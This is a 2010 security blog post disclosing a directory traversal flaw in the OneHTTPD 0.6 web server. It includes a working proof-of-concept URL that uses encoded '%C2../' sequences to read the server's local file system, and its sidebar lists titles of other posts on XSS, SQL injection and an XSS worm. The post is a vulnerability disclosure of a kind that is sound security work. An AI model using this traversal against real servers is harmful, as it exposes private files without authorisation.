skip to main | skip to sidebar

XSS - Cross-Site Scripting

And Other Web Related Deception

This site is soon to be deprecated by http://www.johnleitch.net

Tuesday, April 27, 2010

OneHTTPD 0.6 Directory Traversal

It's possible to navigate the local file system of a server running OneHTTPD 0.6 by using a specially crafted url.

http://localhost/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../
Posted by John Leitch at 6:30 PM
Labels: ASCII, directory traversal, hacking, http server, onehttpd, security

No comments:

Post a Comment

Newer Post Older Post Home
Subscribe to: Post Comments (Atom)

About Me

John Leitch
View my complete profile

Blog Archive

  • ▼  2010 (71)
    • ►  July (28)
    • ►  June (2)
    • ►  May (27)
    • ▼  April (7)
      • Tele Data Contact Management Server 0.9 SQL Injection
      • OneHTTPD 0.6 Directory Traversal
      • Stumpleupon.com Reflected XSS
      • Ning.com Persistent XSS
      • Javascript Keylogger 1.4 Released
      • Prion 1.3 Released - Polymorphic XSS Worm
      • Prion 1.2 Released - Polymorphic XSS Worm
    • ►  March (7)
  • ►  2009 (20)
    • ►  November (2)
    • ►  October (1)
    • ►  September (6)
    • ►  August (2)
    • ►  June (3)
    • ►  May (6)

Blog Catalog

Computer Security Blogs - BlogCatalog Blog Directory

Blogflux

Blog Flux Local - Michigan

Blogged

Programming Blog Directory

Blogville

Blogville